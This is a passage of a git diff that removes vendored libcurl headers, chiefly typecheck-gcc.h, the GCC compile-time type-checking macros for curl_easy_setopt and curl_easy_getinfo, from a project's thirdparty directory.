- * or  __cplusplus so we need to carefully check for them too.
- */
-
-#if defined(__STDC__) || defined(_MSC_VER) || defined(__cplusplus) || \
-  defined(__HP_aCC) || defined(__BORLANDC__) || defined(__LCC__) || \
-  defined(__POCC__) || defined(__SALFORDC__) || defined(__HIGHC__) || \
-  defined(__ILEC400__)
-  /* This compiler is believed to have an ISO compatible preprocessor */
-#define CURL_ISOCPP
-#else
-  /* This compiler is believed NOT to have an ISO compatible preprocessor */
-#undef CURL_ISOCPP
-#endif
-
-/*
- * Macros for minimum-width signed and unsigned curl_off_t integer constants.
- */
-
-#if defined(__BORLANDC__) && (__BORLANDC__ == 0x0551)
-#  define __CURL_OFF_T_C_HLPR2(x) x
-#  define __CURL_OFF_T_C_HLPR1(x) __CURL_OFF_T_C_HLPR2(x)
-#  define CURL_OFF_T_C(Val)  __CURL_OFF_T_C_HLPR1(Val) ## \
-                             __CURL_OFF_T_C_HLPR1(CURL_SUFFIX_CURL_OFF_T)
-#  define CURL_OFF_TU_C(Val) __CURL_OFF_T_C_HLPR1(Val) ## \
-                             __CURL_OFF_T_C_HLPR1(CURL_SUFFIX_CURL_OFF_TU)
-#else
-#  ifdef CURL_ISOCPP
-#    define __CURL_OFF_T_C_HLPR2(Val,Suffix) Val ## Suffix
-#  else
-#    define __CURL_OFF_T_C_HLPR2(Val,Suffix) Val/**/Suffix
-#  endif
-#  define __CURL_OFF_T_C_HLPR1(Val,Suffix) __CURL_OFF_T_C_HLPR2(Val,Suffix)
-#  define CURL_OFF_T_C(Val)  __CURL_OFF_T_C_HLPR1(Val,CURL_SUFFIX_CURL_OFF_T)
-#  define CURL_OFF_TU_C(Val) __CURL_OFF_T_C_HLPR1(Val,CURL_SUFFIX_CURL_OFF_TU)
-#endif
-
-#endif /* __CURL_SYSTEM_H */
diff --git a/thirdparty/curl/include/curl/typecheck-gcc.h b/thirdparty/curl/include/curl/typecheck-gcc.h
deleted file mode 100644
index 3a0f253..0000000
--- a/thirdparty/curl/include/curl/typecheck-gcc.h
+++ /dev/null
@@ -1,696 +0,0 @@
-#ifndef __CURL_TYPECHECK_GCC_H
-#define __CURL_TYPECHECK_GCC_H
-/***************************************************************************
- *                                  _   _ ____  _
- *  Project                     ___| | | |  _ \| |
- *                             / __| | | | |_) | |
- *                            | (__| |_| |  _ <| |___
- *                             \___|\___/|_| \_\_____|
- *
- * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
- *
- * This software is licensed as described in the file COPYING, which
- * you should have received as part of this distribution. The terms
- * are also available at https://curl.haxx.se/docs/copyright.html.
- *
- * You may opt to use, copy, modify, merge, publish, distribute and/or sell
- * copies of the Software, and permit persons to whom the Software is
- * furnished to do so, under the terms of the COPYING file.
- *
- * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
- * KIND, either express or implied.
- *
- ***************************************************************************/
-
-/* wraps curl_easy_setopt() with typechecking */
-
-/* To add a new kind of warning, add an
- *   if(_curl_is_sometype_option(_curl_opt))
- *     if(!_curl_is_sometype(value))
- *       _curl_easy_setopt_err_sometype();
- * block and define _curl_is_sometype_option, _curl_is_sometype and
- * _curl_easy_setopt_err_sometype below
- *
- * NOTE: We use two nested 'if' statements here instead of the && operator, in
- *       order to work around gcc bug #32061.  It affects only gcc 4.3.x/4.4.x
- *       when compiling with -Wlogical-op.
- *
- * To add an option that uses the same type as an existing option, you'll just
- * need to extend the appropriate _curl_*_option macro
- */
-#define curl_easy_setopt(handle, option, value)                               \
-__extension__ ({                                                              \
-  __typeof__(option) _curl_opt = option;                                     \
-  if(__builtin_constant_p(_curl_opt)) {                                       \
-    if(_curl_is_long_option(_curl_opt))                                       \
-      if(!_curl_is_long(value))                                               \
-        _curl_easy_setopt_err_long();                                         \
-    if(_curl_is_off_t_option(_curl_opt))                                      \
-      if(!_curl_is_off_t(value))                                              \
-        _curl_easy_setopt_err_curl_off_t();                                   \
-    if(_curl_is_string_option(_curl_opt))                                     \
-      if(!_curl_is_string(value))                                             \
-        _curl_easy_setopt_err_string();                                       \
-    if(_curl_is_write_cb_option(_curl_opt))                                   \
-      if(!_curl_is_write_cb(value))                                           \
-        _curl_easy_setopt_err_write_callback();                               \
-    if((_curl_opt) == CURLOPT_RESOLVER_START_FUNCTION)                        \
-      if(!_curl_is_resolver_start_callback(value))                            \
-        _curl_easy_setopt_err_resolver_start_callback();                      \
-    if((_curl_opt) == CURLOPT_READFUNCTION)                                   \
-      if(!_curl_is_read_cb(value))                                            \
-        _curl_easy_setopt_err_read_cb();                                      \
-    if((_curl_opt) == CURLOPT_IOCTLFUNCTION)                                  \
-      if(!_curl_is_ioctl_cb(value))                                           \
-        _curl_easy_setopt_err_ioctl_cb();                                     \
-    if((_curl_opt) == CURLOPT_SOCKOPTFUNCTION)                                \
-      if(!_curl_is_sockopt_cb(value))                                         \
-        _curl_easy_setopt_err_sockopt_cb();                                   \
-    if((_curl_opt) == CURLOPT_OPENSOCKETFUNCTION)                             \
-      if(!_curl_is_opensocket_cb(value))                                      \
-        _curl_easy_setopt_err_opensocket_cb();                                \
-    if((_curl_opt) == CURLOPT_PROGRESSFUNCTION)                               \
-      if(!_curl_is_progress_cb(value))                                        \
-        _curl_easy_setopt_err_progress_cb();                                  \
-    if((_curl_opt) == CURLOPT_DEBUGFUNCTION)                                  \
-      if(!_curl_is_debug_cb(value))                                           \
-        _curl_easy_setopt_err_debug_cb();                                     \
-    if((_curl_opt) == CURLOPT_SSL_CTX_FUNCTION)                               \
-      if(!_curl_is_ssl_ctx_cb(value))                                         \
-        _curl_easy_setopt_err_ssl_ctx_cb();                                   \
-    if(_curl_is_conv_cb_option(_curl_opt))                                    \
-      if(!_curl_is_conv_cb(value))                                            \
-        _curl_easy_setopt_err_conv_cb();                                      \
-    if((_curl_opt) == CURLOPT_SEEKFUNCTION)                                   \
-      if(!_curl_is_seek_cb(value))                                            \
-        _curl_easy_setopt_err_seek_cb();                                      \
-    if(_curl_is_cb_data_option(_curl_opt))                                    \
-      if(!_curl_is_cb_data(value))                                            \
-        _curl_easy_setopt_err_cb_data();                                      \
-    if((_curl_opt) == CURLOPT_ERRORBUFFER)                                    \
-      if(!_curl_is_error_buffer(value))                                       \
-        _curl_easy_setopt_err_error_buffer();                                 \
-    if((_curl_opt) == CURLOPT_STDERR)                                         \
-      if(!_curl_is_FILE(value))                                               \
-        _curl_easy_setopt_err_FILE();                                         \
-    if(_curl_is_postfields_option(_curl_opt))                                 \
-      if(!_curl_is_postfields(value))                                         \
-        _curl_easy_setopt_err_postfields();                                   \
-    if((_curl_opt) == CURLOPT_HTTPPOST)                                       \
-      if(!_curl_is_arr((value), struct curl_httppost))                        \
-        _curl_easy_setopt_err_curl_httpost();                                 \
-    if((_curl_opt) == CURLOPT_MIMEPOST)                                       \
-      if(!_curl_is_ptr((value), curl_mime))                                   \
-        _curl_easy_setopt_err_curl_mimepost();                                \
-    if(_curl_is_slist_option(_curl_opt))                                      \
-      if(!_curl_is_arr((value), struct curl_slist))                           \
-        _curl_easy_setopt_err_curl_slist();                                   \
-    if((_curl_opt) == CURLOPT_SHARE)                                          \
-      if(!_curl_is_ptr((value), CURLSH))                                      \
-        _curl_easy_setopt_err_CURLSH();                                       \
-  }                                                                           \
-  curl_easy_setopt(handle, _curl_opt, value);                                 \
-})
-
-/* wraps curl_easy_getinfo() with typechecking */
-/* FIXME: don't allow const pointers */
-#define curl_easy_getinfo(handle, info, arg)                                  \
-__extension__ ({                                                              \
-  __typeof__(info) _curl_info = info;                                         \
-  if(__builtin_constant_p(_curl_info)) {                                      \
-    if(_curl_is_string_info(_curl_info))                                      \
-      if(!_curl_is_arr((arg), char *))                                        \
-        _curl_easy_getinfo_err_string();                                      \
-    if(_curl_is_long_info(_curl_info))                                        \
-      if(!_curl_is_arr((arg), long))                                          \
-        _curl_easy_getinfo_err_long();                                        \
-    if(_curl_is_double_info(_curl_info))                                      \
-      if(!_curl_is_arr((arg), double))                                        \
-        _curl_easy_getinfo_err_double();                                      \
-    if(_curl_is_slist_info(_curl_info))                                       \
-      if(!_curl_is_arr((arg), struct curl_slist *))                           \
-        _curl_easy_getinfo_err_curl_slist();                                  \
-    if(_curl_is_tlssessioninfo_info(_curl_info))                              \
-      if(!_curl_is_arr((arg), struct curl_tlssessioninfo *))                  \
-        _curl_easy_getinfo_err_curl_tlssesssioninfo();                        \
-    if(_curl_is_certinfo_info(_curl_info))                                    \
-      if(!_curl_is_arr((arg), struct curl_certinfo *))                        \
-        _curl_easy_getinfo_err_curl_certinfo();                               \
-    if(_curl_is_socket_info(_curl_info))                                      \
-      if(!_curl_is_arr((arg), curl_socket_t))                                 \
-        _curl_easy_getinfo_err_curl_socket();                                 \
-    if(_curl_is_off_t_info(_curl_info))                                       \
-      if(!_curl_is_arr((arg), curl_off_t))                                    \
-        _curl_easy_getinfo_err_curl_off_t();                                  \
-  }                                                                           \
-  curl_easy_getinfo(handle, _curl_info, arg);                                 \
-})
-
-/* TODO: typechecking for curl_share_setopt() and curl_multi_setopt(),
- * for now just make sure that the functions are called with three
- * arguments
- */
-#define curl_share_setopt(share,opt,param) curl_share_setopt(share,opt,param)
-#define curl_multi_setopt(handle,opt,param) curl_multi_setopt(handle,opt,param)
-
-
-/* the actual warnings, triggered by calling the _curl_easy_setopt_err*
- * functions */
-
-/* To define a new warning, use _CURL_WARNING(identifier, "message") */
-#define _CURL_WARNING(id, message)                                            \
-  static void __attribute__((__warning__(message)))                           \
-  __attribute__((__unused__)) __attribute__((__noinline__))                   \
-  id(void) { __asm__(""); }
-
-_CURL_WARNING(_curl_easy_setopt_err_long,
-  "curl_easy_setopt expects a long argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_off_t,
-  "curl_easy_setopt expects a curl_off_t argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_string,
-              "curl_easy_setopt expects a "
-              "string ('char *' or char[]) argument for this option"
-  )
-_CURL_WARNING(_curl_easy_setopt_err_write_callback,
-  "curl_easy_setopt expects a curl_write_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_resolver_start_callback,
-              "curl_easy_setopt expects a "
-              "curl_resolver_start_callback argument for this option"
-  )
-_CURL_WARNING(_curl_easy_setopt_err_read_cb,
-  "curl_easy_setopt expects a curl_read_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_ioctl_cb,
-  "curl_easy_setopt expects a curl_ioctl_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_sockopt_cb,
-  "curl_easy_setopt expects a curl_sockopt_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_opensocket_cb,
-              "curl_easy_setopt expects a "
-              "curl_opensocket_callback argument for this option"
-  )
-_CURL_WARNING(_curl_easy_setopt_err_progress_cb,
-  "curl_easy_setopt expects a curl_progress_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_debug_cb,
-  "curl_easy_setopt expects a curl_debug_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_ssl_ctx_cb,
-  "curl_easy_setopt expects a curl_ssl_ctx_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_conv_cb,
-  "curl_easy_setopt expects a curl_conv_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_seek_cb,
-  "curl_easy_setopt expects a curl_seek_callback argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_cb_data,
-              "curl_easy_setopt expects a "
-              "private data pointer as argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_error_buffer,
-              "curl_easy_setopt expects a "
-              "char buffer of CURL_ERROR_SIZE as argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_FILE,
-  "curl_easy_setopt expects a 'FILE *' argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_postfields,
-  "curl_easy_setopt expects a 'void *' or 'char *' argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_httpost,
-              "curl_easy_setopt expects a 'struct curl_httppost *' "
-              "argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_mimepost,
-              "curl_easy_setopt expects a 'curl_mime *' "
-              "argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_curl_slist,
-  "curl_easy_setopt expects a 'struct curl_slist *' argument for this option")
-_CURL_WARNING(_curl_easy_setopt_err_CURLSH,
-  "curl_easy_setopt expects a CURLSH* argument for this option")
-
-_CURL_WARNING(_curl_easy_getinfo_err_string,
-  "curl_easy_getinfo expects a pointer to 'char *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_long,
-  "curl_easy_getinfo expects a pointer to long for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_double,
-  "curl_easy_getinfo expects a pointer to double for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_slist,
-  "curl_easy_getinfo expects a pointer to 'struct curl_slist *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_tlssesssioninfo,
-              "curl_easy_getinfo expects a pointer to "
-              "'struct curl_tlssessioninfo *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_certinfo,
-              "curl_easy_getinfo expects a pointer to "
-              "'struct curl_certinfo *' for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_socket,
-  "curl_easy_getinfo expects a pointer to curl_socket_t for this info")
-_CURL_WARNING(_curl_easy_getinfo_err_curl_off_t,
-  "curl_easy_getinfo expects a pointer to curl_off_t for this info")
-
-/* groups of curl_easy_setops options that take the same type of argument */
-
-/* To add a new option to one of the groups, just add
- *   (option) == CURLOPT_SOMETHING
- * to the or-expression. If the option takes a long or curl_off_t, you don't
- * have to do anything
- */
-
-/* evaluates to true if option takes a long argument */
-#define _curl_is_long_option(option)                                          \
-  (0 < (option) && (option) < CURLOPTTYPE_OBJECTPOINT)
-
-#define _curl_is_off_t_option(option)                                         \
-  ((option) > CURLOPTTYPE_OFF_T)
-
-/* evaluates to true if option takes a char* argument */
-#define _curl_is_string_option(option)                                        \
-  ((option) == CURLOPT_ABSTRACT_UNIX_SOCKET ||                                \
-   (option) == CURLOPT_ACCEPT_ENCODING ||                                     \
-   (option) == CURLOPT_CAINFO ||                                              \
-   (option) == CURLOPT_CAPATH ||                                              \
-   (option) == CURLOPT_COOKIE ||                                              \
-   (option) == CURLOPT_COOKIEFILE ||                                          \
-   (option) == CURLOPT_COOKIEJAR ||                                           \
-   (option) == CURLOPT_COOKIELIST ||                                          \
-   (option) == CURLOPT_CRLFILE ||                                             \
-   (option) == CURLOPT_CUSTOMREQUEST ||                                       \
-   (option) == CURLOPT_DEFAULT_PROTOCOL ||                                    \
-   (option) == CURLOPT_DNS_INTERFACE ||                                       \
-   (option) == CURLOPT_DNS_LOCAL_IP4 ||                                       \
-   (option) == CURLOPT_DNS_LOCAL_IP6 ||                                       \
-   (option) == CURLOPT_DNS_SERVERS ||                                         \
-   (option) == CURLOPT_EGDSOCKET ||                                           \
-   (option) == CURLOPT_FTPPORT ||                                             \
-   (option) == CURLOPT_FTP_ACCOUNT ||                                         \
-   (option) == CURLOPT_FTP_ALTERNATIVE_TO_USER ||                             \
-   (option) == CURLOPT_INTERFACE ||                                           \
-   (option) == CURLOPT_ISSUERCERT ||                                          \
-   (option) == CURLOPT_KEYPASSWD ||                                           \
-   (option) == CURLOPT_KRBLEVEL ||                                            \
-   (option) == CURLOPT_LOGIN_OPTIONS ||                                       \
-   (option) == CURLOPT_MAIL_AUTH ||                                           \
-   (option) == CURLOPT_MAIL_FROM ||                                           \
-   (option) == CURLOPT_NETRC_FILE ||                                          \
-   (option) == CURLOPT_NOPROXY ||                                             \
-   (option) == CURLOPT_PASSWORD ||                                            \
-   (option) == CURLOPT_PINNEDPUBLICKEY ||                                     \
-   (option) == CURLOPT_PRE_PROXY ||                                           \
-   (option) == CURLOPT_PROXY ||                                               \
-   (option) == CURLOPT_PROXYPASSWORD ||                                       \
-   (option) == CURLOPT_PROXYUSERNAME ||                                       \
-   (option) == CURLOPT_PROXYUSERPWD ||                                        \
-   (option) == CURLOPT_PROXY_CAINFO ||                                        \
-   (option) == CURLOPT_PROXY_CAPATH ||                                        \
-   (option) == CURLOPT_PROXY_CRLFILE ||                                       \
-   (option) == CURLOPT_PROXY_KEYPASSWD ||                                     \
-   (option) == CURLOPT_PROXY_PINNEDPUBLICKEY ||                               \
-   (option) == CURLOPT_PROXY_SERVICE_NAME ||                                  \
-   (option) == CURLOPT_PROXY_SSLCERT ||                                       \
-   (option) == CURLOPT_PROXY_SSLCERTTYPE ||                                   \
-   (option) == CURLOPT_PROXY_SSLKEY ||                                        \
-   (option) == CURLOPT_PROXY_SSLKEYTYPE ||                                    \
-   (option) == CURLOPT_PROXY_SSL_CIPHER_LIST ||                               \
-   (option) == CURLOPT_PROXY_TLSAUTH_PASSWORD ||                              \
-   (option) == CURLOPT_PROXY_TLSAUTH_USERNAME ||                              \
-   (option) == CURLOPT_PROXY_TLSAUTH_TYPE ||                                  \
-   (option) == CURLOPT_RANDOM_FILE ||                                         \
-   (option) == CURLOPT_RANGE ||                                               \
-   (option) == CURLOPT_REFERER ||                                             \
-   (option) == CURLOPT_RTSP_SESSION_ID ||                                     \
-   (option) == CURLOPT_RTSP_STREAM_URI ||                                     \
-   (option) == CURLOPT_RTSP_TRANSPORT ||                                      \
-   (option) == CURLOPT_SERVICE_NAME ||                                        \
-   (option) == CURLOPT_SOCKS5_GSSAPI_SERVICE ||                               \
-   (option) == CURLOPT_SSH_HOST_PUBLIC_KEY_MD5 ||                             \
-   (option) == CURLOPT_SSH_KNOWNHOSTS ||                                      \
-   (option) == CURLOPT_SSH_PRIVATE_KEYFILE ||                                 \
-   (option) == CURLOPT_SSH_PUBLIC_KEYFILE ||                                  \
-   (option) == CURLOPT_SSLCERT ||                                             \
-   (option) == CURLOPT_SSLCERTTYPE ||                                         \
-   (option) == CURLOPT_SSLENGINE ||                                           \
-   (option) == CURLOPT_SSLKEY ||                                              \
-   (option) == CURLOPT_SSLKEYTYPE ||                                          \
-   (option) == CURLOPT_SSL_CIPHER_LIST ||                                     \
-   (option) == CURLOPT_TLSAUTH_PASSWORD ||                                    \
-   (option) == CURLOPT_TLSAUTH_TYPE ||                                        \
-   (option) == CURLOPT_TLSAUTH_USERNAME ||                                    \
-   (option) == CURLOPT_UNIX_SOCKET_PATH ||                                    \
-   (option) == CURLOPT_URL ||                                                 \
-   (option) == CURLOPT_USERAGENT ||                                           \
-   (option) == CURLOPT_USERNAME ||                                            \
-   (option) == CURLOPT_USERPWD ||                                             \
-   (option) == CURLOPT_XOAUTH2_BEARER ||                                      \
-   0)
-
-/* evaluates to true if option takes a curl_write_callback argument */
-#define _curl_is_write_cb_option(option)                                      \
-  ((option) == CURLOPT_HEADERFUNCTION ||                                      \
-   (option) == CURLOPT_WRITEFUNCTION)
-
-/* evaluates to true if option takes a curl_conv_callback argument */
-#define _curl_is_conv_cb_option(option)                                       \
-  ((option) == CURLOPT_CONV_TO_NETWORK_FUNCTION ||                            \
-   (option) == CURLOPT_CONV_FROM_NETWORK_FUNCTION ||                          \
-   (option) == CURLOPT_CONV_FROM_UTF8_FUNCTION)
-
-/* evaluates to true if option takes a data argument to pass to a callback */
-#define _curl_is_cb_data_option(option)                                       \
-  ((option) == CURLOPT_CHUNK_DATA ||                                          \
-   (option) == CURLOPT_CLOSESOCKETDATA ||                                     \
-   (option) == CURLOPT_DEBUGDATA ||                                           \
-   (option) == CURLOPT_FNMATCH_DATA ||                                        \
-   (option) == CURLOPT_HEADERDATA ||                                          \
-   (option) == CURLOPT_INTERLEAVEDATA ||                                      \
-   (option) == CURLOPT_IOCTLDATA ||                                           \
-   (option) == CURLOPT_OPENSOCKETDATA ||                                      \
-   (option) == CURLOPT_PRIVATE ||                                             \
-   (option) == CURLOPT_PROGRESSDATA ||                                        \
-   (option) == CURLOPT_READDATA ||                                            \
-   (option) == CURLOPT_SEEKDATA ||                                            \
-   (option) == CURLOPT_SOCKOPTDATA ||                                         \
-   (option) == CURLOPT_SSH_KEYDATA ||                                         \
-   (option) == CURLOPT_SSL_CTX_DATA ||                                        \
-   (option) == CURLOPT_WRITEDATA ||                                           \
-   (option) == CURLOPT_RESOLVER_START_DATA ||                                 \
-   0)
-
-/* evaluates to true if option takes a POST data argument (void* or char*) */
-#define _curl_is_postfields_option(option)                                    \
-  ((option) == CURLOPT_POSTFIELDS ||                                          \
-   (option) == CURLOPT_COPYPOSTFIELDS ||                                      \
-   0)
-
-/* evaluates to true if option takes a struct curl_slist * argument */
-#define _curl_is_slist_option(option)                                         \
-  ((option) == CURLOPT_HTTP200ALIASES ||                                      \
-   (option) == CURLOPT_HTTPHEADER ||                                          \
-   (option) == CURLOPT_MAIL_RCPT ||                                           \
-   (option) == CURLOPT_POSTQUOTE ||                                           \
-   (option) == CURLOPT_PREQUOTE ||                                            \
-   (option) == CURLOPT_PROXYHEADER ||                                         \
-   (option) == CURLOPT_QUOTE ||                                               \
-   (option) == CURLOPT_RESOLVE ||                                             \
-   (option) == CURLOPT_TELNETOPTIONS ||                                       \
-   0)
-
-/* groups of curl_easy_getinfo infos that take the same type of argument */
-
-/* evaluates to true if info expects a pointer to char * argument */
-#define _curl_is_string_info(info)                                            \
-  (CURLINFO_STRING < (info) && (info) < CURLINFO_LONG)
-
-/* evaluates to true if info expects a pointer to long argument */
-#define _curl_is_long_info(info)                                              \
-  (CURLINFO_LONG < (info) && (info) < CURLINFO_DOUBLE)
-
-/* evaluates to true if info expects a pointer to double argument */
-#define _curl_is_double_info(info)                                            \
-  (CURLINFO_DOUBLE < (info) && (info) < CURLINFO_SLIST)
-
-/* true if info expects a pointer to struct curl_slist * argument */
-#define _curl_is_slist_info(info)                                       \
-  (((info) == CURLINFO_SSL_ENGINES) || ((info) == CURLINFO_COOKIELIST))
-
-/* true if info expects a pointer to struct curl_tlssessioninfo * argument */
-#define _curl_is_tlssessioninfo_info(info)                              \
-  (((info) == CURLINFO_TLS_SSL_PTR) || ((info) == CURLINFO_TLS_SESSION))
-
-/* true if info expects a pointer to struct curl_certinfo * argument */
-#define _curl_is_certinfo_info(info) ((info) == CURLINFO_CERTINFO)
-
-/* true if info expects a pointer to struct curl_socket_t argument */
-#define _curl_is_socket_info(info)                                            \
-  (CURLINFO_SOCKET < (info) && (info) < CURLINFO_OFF_T)
-
-/* true if info expects a pointer to curl_off_t argument */
-#define _curl_is_off_t_info(info)                                             \
-  (CURLINFO_OFF_T < (info))
-
-
-/* typecheck helpers -- check whether given expression has requested type*/
-
-/* For pointers, you can use the _curl_is_ptr/_curl_is_arr macros,
- * otherwise define a new macro. Search for __builtin_types_compatible_p
- * in the GCC manual.
- * NOTE: these macros MUST NOT EVALUATE their arguments! The argument is
- * the actual expression passed to the curl_easy_setopt macro. This
- * means that you can only apply the sizeof and __typeof__ operators, no
- * == or whatsoever.
- */
-
-/* XXX: should evaluate to true iff expr is a pointer */
-#define _curl_is_any_ptr(expr)                                                \
-  (sizeof(expr) == sizeof(void *))
-
-/* evaluates to true if expr is NULL */
-/* XXX: must not evaluate expr, so this check is not accurate */
-#define _curl_is_NULL(expr)                                                   \
-  (__builtin_types_compatible_p(__typeof__(expr), __typeof__(NULL)))
-
-/* evaluates to true if expr is type*, const type* or NULL */
-#define _curl_is_ptr(expr, type)                                              \
-  (_curl_is_NULL(expr) ||                                                     \
-   __builtin_types_compatible_p(__typeof__(expr), type *) ||                  \
-   __builtin_types_compatible_p(__typeof__(expr), const type *))
-
-/* evaluates to true if expr is one of type[], type*, NULL or const type* */
-#define _curl_is_arr(expr, type)                                              \
-  (_curl_is_ptr((expr), type) ||                                              \
-   __builtin_types_compatible_p(__typeof__(expr), type []))
-
-/* evaluates to true if expr is a string */
-#define _curl_is_string(expr)                                                 \
-  (_curl_is_arr((expr), char) ||                                              \
-   _curl_is_arr((expr), signed char) ||                                       \
-   _curl_is_arr((expr), unsigned char))
-
-/* evaluates to true if expr is a long (no matter the signedness)
- * XXX: for now, int is also accepted (and therefore short and char, which
- * are promoted to int when passed to a variadic function) */
-#define _curl_is_long(expr)                                                   \
-  (__builtin_types_compatible_p(__typeof__(expr), long) ||                    \
-   __builtin_types_compatible_p(__typeof__(expr), signed long) ||             \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned long) ||           \
-   __builtin_types_compatible_p(__typeof__(expr), int) ||                     \
-   __builtin_types_compatible_p(__typeof__(expr), signed int) ||              \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned int) ||            \
-   __builtin_types_compatible_p(__typeof__(expr), short) ||                   \
-   __builtin_types_compatible_p(__typeof__(expr), signed short) ||            \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned short) ||          \
-   __builtin_types_compatible_p(__typeof__(expr), char) ||                    \
-   __builtin_types_compatible_p(__typeof__(expr), signed char) ||             \
-   __builtin_types_compatible_p(__typeof__(expr), unsigned char))
-
-/* evaluates to true if expr is of type curl_off_t */
-#define _curl_is_off_t(expr)                                                  \
-  (__builtin_types_compatible_p(__typeof__(expr), curl_off_t))
-
-/* evaluates to true if expr is abuffer suitable for CURLOPT_ERRORBUFFER */
-/* XXX: also check size of an char[] array? */
-#define _curl_is_error_buffer(expr)                                           \
-  (_curl_is_NULL(expr) ||                                                     \
-   __builtin_types_compatible_p(__typeof__(expr), char *) ||                  \
-   __builtin_types_compatible_p(__typeof__(expr), char[]))
-
-/* evaluates to true if expr is of type (const) void* or (const) FILE* */
-#if 0
-#define _curl_is_cb_data(expr)                                                \
-  (_curl_is_ptr((expr), void) ||                                              \
-   _curl_is_ptr((expr), FILE))
-#else /* be less strict */
-#define _curl_is_cb_data(expr)                                                \
-  _curl_is_any_ptr(expr)
-#endif
-
-/* evaluates to true if expr is of type FILE* */
-#define _curl_is_FILE(expr)                                             \
-  (_curl_is_NULL(expr) ||                                              \
-   (__builtin_types_compatible_p(__typeof__(expr), FILE *)))
-
-/* evaluates to true if expr can be passed as POST data (void* or char*) */
-#define _curl_is_postfields(expr)                                             \
-  (_curl_is_ptr((expr), void) ||                                              \
-   _curl_is_arr((expr), char))
-
-/* FIXME: the whole callback checking is messy...
- * The idea is to tolerate char vs. void and const vs. not const
- * pointers in arguments at least
- */
-/* helper: __builtin_types_compatible_p distinguishes between functions and
- * function pointers, hide it */
-#define _curl_callback_compatible(func, type)                                 \
-  (__builtin_types_compatible_p(__typeof__(func), type) ||                    \
-   __builtin_types_compatible_p(__typeof__(func) *, type))
-
-/* evaluates to true if expr is of type curl_resolver_start_callback */
-#define _curl_is_resolver_start_callback(expr)       \
-  (_curl_is_NULL(expr) || \
-   _curl_callback_compatible((expr), curl_resolver_start_callback))
-
-/* evaluates to true if expr is of type curl_read_callback or "similar" */
-#define _curl_is_read_cb(expr)                                          \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), __typeof__(fread) *) ||                  \
-   _curl_callback_compatible((expr), curl_read_callback) ||                   \
-   _curl_callback_compatible((expr), _curl_read_callback1) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback2) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback3) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback4) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback5) ||                 \
-   _curl_callback_compatible((expr), _curl_read_callback6))
-typedef size_t (*_curl_read_callback1)(char *, size_t, size_t, void *);
-typedef size_t (*_curl_read_callback2)(char *, size_t, size_t, const void *);
-typedef size_t (*_curl_read_callback3)(char *, size_t, size_t, FILE *);
-typedef size_t (*_curl_read_callback4)(void *, size_t, size_t, void *);
-typedef size_t (*_curl_read_callback5)(void *, size_t, size_t, const void *);
-typedef size_t (*_curl_read_callback6)(void *, size_t, size_t, FILE *);
-
-/* evaluates to true if expr is of type curl_write_callback or "similar" */
-#define _curl_is_write_cb(expr)                                               \
-  (_curl_is_read_cb(expr) ||                                            \
-   _curl_callback_compatible((expr), __typeof__(fwrite) *) ||                 \
-   _curl_callback_compatible((expr), curl_write_callback) ||                  \
-   _curl_callback_compatible((expr), _curl_write_callback1) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback2) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback3) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback4) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback5) ||                \
-   _curl_callback_compatible((expr), _curl_write_callback6))
-typedef size_t (*_curl_write_callback1)(const char *, size_t, size_t, void *);
-typedef size_t (*_curl_write_callback2)(const char *, size_t, size_t,
-                                       const void *);
-typedef size_t (*_curl_write_callback3)(const char *, size_t, size_t, FILE *);
-typedef size_t (*_curl_write_callback4)(const void *, size_t, size_t, void *);
-typedef size_t (*_curl_write_callback5)(const void *, size_t, size_t,
-                                       const void *);
-typedef size_t (*_curl_write_callback6)(const void *, size_t, size_t, FILE *);
-
-/* evaluates to true if expr is of type curl_ioctl_callback or "similar" */
-#define _curl_is_ioctl_cb(expr)                                         \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_ioctl_callback) ||                  \
-   _curl_callback_compatible((expr), _curl_ioctl_callback1) ||                \
-   _curl_callback_compatible((expr), _curl_ioctl_callback2) ||                \
-   _curl_callback_compatible((expr), _curl_ioctl_callback3) ||                \
-   _curl_callback_compatible((expr), _curl_ioctl_callback4))
-typedef curlioerr (*_curl_ioctl_callback1)(CURL *, int, void *);
-typedef curlioerr (*_curl_ioctl_callback2)(CURL *, int, const void *);
-typedef curlioerr (*_curl_ioctl_callback3)(CURL *, curliocmd, void *);
-typedef curlioerr (*_curl_ioctl_callback4)(CURL *, curliocmd, const void *);
-
-/* evaluates to true if expr is of type curl_sockopt_callback or "similar" */
-#define _curl_is_sockopt_cb(expr)                                       \
